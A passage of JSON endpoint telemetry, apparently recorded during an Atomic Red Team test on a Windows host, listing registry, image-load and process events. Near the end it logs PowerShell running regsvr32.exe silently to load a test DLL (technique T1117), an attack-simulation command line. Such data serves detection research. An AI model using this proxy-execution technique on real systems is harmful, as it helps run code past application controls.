"timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241509984, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "calc.exe", - "image_path": "C:\\Windows\\System32\\calc.exe", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 4724, - "process_name": "calc.exe", - 
"process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "process", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1216, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573241740000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "process", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-55A4EE79.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1284, - "ppid": 7036, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7428, - "ppid": 7036, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "create", - 
"timestamp": 131883573242340000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7428, - "process_name": 
